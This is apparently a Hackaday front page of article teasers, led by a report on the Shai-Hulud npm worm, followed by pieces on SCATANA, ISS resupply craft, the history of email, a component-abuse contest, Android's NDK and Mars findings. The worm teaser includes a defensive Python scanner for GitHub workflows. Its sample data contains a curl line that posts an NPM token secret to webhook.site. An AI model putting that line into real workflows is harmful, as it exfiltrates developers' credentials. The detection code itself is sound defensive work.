This Week In Security: The Shai-Hulud Worm, ShadowLeak, And Inside The Great Firewall

Hardly a week goes by that there isn’t a story to cover about malware getting published to a repository. Last week it was millions of downloads on NPM, but this week it’s something much more concerning. Malware published on NPM is now looking for NPM tokens, and propagating to other NPM packages when found. Yes, it’s a worm, jumping from one NPM package to another, via installs on developer machines.

It does other things too, like grabbing all the secrets it can find when installed on a machine. If the compromised machine has access to a GitHub account, a new repo is created named Shai-Hulud, borrowed from the name of the sandworms from Dune. The collected secrets and machine info get uploaded there, and a workflow also uploads any available GitHub secrets to the webhook.site domain.

How many packages are we talking about? At least 187, with some reports of over 500 packages compromised. The immediate attack has been contained, as NPM has worked to remove the compromised packages, and apparently has added filtering code that blocks the upload of compromised packages.

So far there hasn’t been an official statement on the worm from NPM or its parent companies, GitHub or Microsoft. Malicious packages uploaded to NPM are definitely nothing new. But this is the first time we’ve seen a worm that specializes in NPM packages. It’s not a good step for the trustworthiness of NPM or the direct package distribution model.
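One place a defender can look for the behaviour described above is a repository’s own CI configuration. The script below is an added example, not code from the article or from npm/GitHub: it scans workflow text for a line that references the GitHub secrets context alongside a webhook.site URL, and treats the file as suspicious only when both signals are present. The regexes and the two sample workflows are constructed for this example and are not published indicators.

```python
import re
from dataclasses import dataclass

# Signals drawn from the article's description: the worm's workflow reads
# GitHub secrets and posts them to the webhook.site domain. The regexes are
# this example's own, not indicators published by npm or GitHub.
EXFIL_DOMAIN = re.compile(r"\bwebhook\.site\b", re.IGNORECASE)
SECRETS_REF = re.compile(r"\$\{\{[^}]*\bsecrets\b", re.IGNORECASE)

@dataclass(frozen=True)
class Finding:
    line_no: int  # 1-based line in the workflow file
    reason: str   # which signal matched
    text: str     # the offending line, stripped

def scan_workflow(text: str) -> list[Finding]:
    """Flag a workflow only when it both references the secrets context and
    talks to webhook.site; a workflow that merely uses secrets is normal."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        if EXFIL_DOMAIN.search(line):
            findings.append(Finding(no, "exfil-domain", line.strip()))
        if SECRETS_REF.search(line):
            findings.append(Finding(no, "secrets-context", line.strip()))
    if {f.reason for f in findings} != {"exfil-domain", "secrets-context"}:
        return []  # need both signals in one file before calling it suspicious
    return findings

# Constructed sample shaped like the behaviour the article describes.
MALICIOUS_WORKFLOW = """\
name: ci
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: curl -X POST -d "t=${{ secrets.NPM_TOKEN }}" https://webhook.site/EXAMPLE-ID
"""

# Constructed sample: a legitimate secret sent to the project's own host.
BENIGN_WORKFLOW = """\
name: deploy
on: push
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - run: curl -H "Authorization: Bearer ${{ secrets.DEPLOY_TOKEN }}" https://deploy.example.com/
"""
```

Running `scan_workflow` over every file under `.github/workflows` returns the matching lines for the first sample and nothing for the second, since legitimate use of a secret against the project’s own host is not flagged on its own.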

Continue reading “This Week In Security: The Shai-Hulud Worm, ShadowLeak, And Inside The Great Firewall”

Radio Apocalypse: Clearing The Air With SCATANA

For the most part, the Radio Apocalypse series has focused on the radio systems developed during the early days of the atomic age to ensure that Armageddon would be as orderly an affair as possible. From systems that provided backup methods to ensure that launch orders would reach the bombers and missiles, to providing hardened communications systems to allow survivors to coordinate relief and start rebuilding civilization from the ashes, a lot of effort went into getting messages sent.

Strangely, though, the architects of the end of the world put just as much thought into making sure messages didn’t get sent. The electronic village of mid-century America was abuzz with signals, any of which could be abused by enemy forces. CONELRAD, which aimed to prevent enemy bombers from using civilian broadcast signals as navigation aids, is a perfect example of this. But the growth of civil aviation through the period presented a unique challenge, particularly with the radio navigation system built specifically to make air travel as safe and reliable as possible.

Balancing the needs of civil aviation against the possibility that the very infrastructure making it possible could be used as a weapon against the U.S. homeland is the purpose of a plan called Security Control of Air Traffic and Air Navigation Aids, or SCATANA. It’s a plan that cuts across jurisdictions, bringing military, aviation, and communications authorities into the loop for decisions regarding when and how to shut down the entire air traffic system, to sort friend from foe, to give the military room to work, and, perhaps most importantly, to keep enemy aircraft as blind as possible. Continue reading “Radio Apocalypse: Clearing The Air With SCATANA”

A New Generation Of Spacecraft Head To The ISS

While many in the industry were at first skeptical of NASA’s goal to put resupply flights to the International Space Station in the hands of commercial operators, the results speak for themselves. Since 2012, the SpaceX Dragon family of spacecraft has been transporting crew and cargo from American soil to the orbiting laboratory, a capability that the space agency had lost with the retirement of the Space Shuttle. Putting these relatively routine missions in the hands of a commercial provider like SpaceX takes some of the logistical and financial burden off of NASA, allowing them to focus on more forward-looking projects.

SpaceX Dragon arriving at the ISS for the first time in 2012.

But as the saying goes, you should never put all of your eggs in one basket. As successful as SpaceX has been, there’s always a chance that some issue could temporarily ground either the Falcon 9 or the Dragon.

While Russia’s Progress and Soyuz vehicles would still be available in an emergency situation, it’s in everyone’s best interest that there be multiple backup vehicles that can bring critical supplies to the Station.

Which is precisely why several new or upgraded spacecraft, designed specifically for performing resupply missions to the ISS and any potential commercial successor, are coming online over the next few years.

In fact, one of them is already flying its first mission, and will likely have arrived at the International Space Station by the time you read this article.

Continue reading “A New Generation Of Spacecraft Head To The ISS”

Forgotten Internet: The Story Of Email

It is a common occurrence in old movies: Our hero checks in at a hotel in some exotic locale, and the desk clerk says, “Ah, Mr. Barker, there’s a letter for you.” Or maybe a telegram. Either way, since humans learned to write, they’ve been obsessed with getting their writing in the hands of someone else. Back when we were wondering what people would do if they had a computer in their homes, most of us never guessed it would be: write to each other. Yet that turned out to be the killer app, or, at least, one of them.

What’s interesting about the hotel mail was that you had to plan ahead and know when your recipient would be there. Otherwise, you had to send your note to their home address, and it would have to wait. Telegrams were a little better because they were fast, but you still had to know where to send the message.

Early Days

An ad from the 1970s with a prominent Telex number

In addition to visiting a telegraph office, or post office, to send a note somewhere, commercial users started wanting something better in the early part of the twentieth century. This led to dedicated teletype lines. By 1933, though, a network of Teletype machines — Telex — arose. Before the Internet, it was very common for a company to advertise its Telex number — or TWX number, a competing network from the phone company and, later, Western Union — if they dealt with business accounts.

Fax machines came later, and the hardware was cheap enough that the average person was slightly more likely to have a fax machine or the use of one than a Telex.

Continue reading “Forgotten Internet: The Story Of Email”

2025 Hackaday Component Abuse Challenge: Let The Games Begin!

In theory, all parts are ideal and do just exactly what they say on the box. In practice, everything has its limits, most components have non-ideal characteristics, and you can even turn most parts’ functionality upside down.

The Component Abuse Challenge celebrates the use of LEDs as photosensors, capacitors as microphones, and resistors as heat sources. If you’re using parts for purposes that simply aren’t on the label, or getting away with pushing them to their absolute maximum ratings or beyond, this is the contest for you.

If you committed these sins against engineering out of need, DigiKey wants to help you out. They’ve probably got the right part, and they’re providing us with three $150 gift certificates to give out to the top projects. (If you’re hacking just for fun, well, you’re still in the running.)

This is the contest where the number one rule is that you must break the rules, and the project has to work anyway. You’ve got eight weeks, until Nov 11th. Open up a project over at Hackaday.io, pull down the menu to enter in the contest, and let the parts know no mercy!

Honorable Mention Categories:

We’ve come up with a few honorable mention categories to get your ideas flowing. You don’t have to fit into one of these boxes to enter, but we’ll be picking our favorites in these four categories for a shout-out when we reveal the winners.

  • Bizarro World: There is a duality in almost every component out there. Speakers are microphones, LEDs are light sensors, and Peltier coolers generate electricity. Turn the parts upside down and show us what they can do.
  • Side Effects: Most of the time, you’re sad when a part’s spec varies with temperature. Turn those lemons into lemonade, or better yet, thermometers.
  • Out of Spec: How hard can you push that MOSFET before it lets go of the magic smoke? Show us your project dancing on the edge of the abyss and surviving.
  • Junk Box Substitutions: What you really needed was an igniter coil. You used an eighth-watt resistor, and got it hot enough to catch the rocket motor on fire. Share your parts-swapping exploits with us.

Inspiration

Diodes can do nearly anything. Their forward voltage varies with temperature, making them excellent thermometers. Even the humble LED can both glow and tell you how hot it is. And don’t get us started on the photo-diode. They are not just photocells, but radiation detectors.

Here’s a trick to double the current that a 555 timer can sink. We’d love to see other cases of 555 abuse, of course, but any other IC is fair game.

Resistors get hot. Thermochromic paint changes color with temperature. Every five years or so, we see an awesome new design. This ancient clock of [Sprite_tm]’s lays the foundation, [Daniel Valuch] takes it into the matrix, and [anneosaur] uses the effect to brighten our days.

Of course, thin traces can also be resistors, and resistors can get really hot. Check out [Carl Bujega]’s self-soldering four-layer PCB. And while magnetism is nearly magic, a broken inductor can still be put to good use as a bike chain sensor.

Or maybe you have a new twist on the absolutely classic LEDs-as-light-sensors? Just because it’s been done since the early days of [Forrest Mims] doesn’t mean we don’t want to see your take.

Get out there and show us how you can do it wrong too.

Going Native With Android’s Native Development Kit

Originally Android apps were only developed in Java, targeting the Dalvik Java Virtual Machine (JVM) and its associated environment. Compared to platforms like iOS with Objective-C, which is just C with Smalltalk uncomfortably crammed into it, an obvious problem here is that any JVM will significantly cripple performance, both due to a lack of direct hardware access and the garbage-collector that makes real-time applications such as games effectively impossible. There is also the issue that there is a lot more existing code written in languages like C and C++, with not a lot of enthusiasm among companies for porting existing codebases to Java, or the mostly Android-specific Kotlin.

The solution here was the Native Development Kit (NDK), which was introduced in 2009 and provides a sandboxed environment that native binaries can run in. The limitations here are mostly due to many standard APIs from a GNU/Linux or BSD environment not being present in Android/Linux, along with the use of the minimalistic Bionic C library and APIs that require a detour via the JVM rather than having it available via the NDK.

Despite these issues, using the NDK can still save a lot of time and allows for the sharing of mostly the same codebase between Android, desktop Linux, BSD and Windows.

Continue reading “Going Native With Android’s Native Development Kit”

Hackaday Links: September 14, 2025

Is it finally time to cue up the Bowie? Or was the NASA presser on Wednesday announcing new findings of potential Martian biosignatures from Perseverance just another in a long line of “We are not alone” teases that turn out to be false alarms? Time will tell, but from the peer-reviewed paper released simultaneously with the news conference, it appears that biological activity is now the simplest explanation for the geochemistry observed in some rock samples analyzed by the rover last year. There’s a lot in the paper to unpack, most of which is naturally directed at planetary scientists and therefore somewhat dense reading. But the gist is that Perseverance sampled some sedimentary rocks in Jezero crater back in July of 2024 with the SHERLOC and PIXL instruments, extensive analysis of which suggests the presence of “reaction fronts” within the rock that produced iron phosphate and iron sulfide minerals in characteristic shapes, such as the ring-like formations they dubbed “leopard spots,” and the pinpoint “poppy seed” formations.

Continue reading “Hackaday Links: September 14, 2025”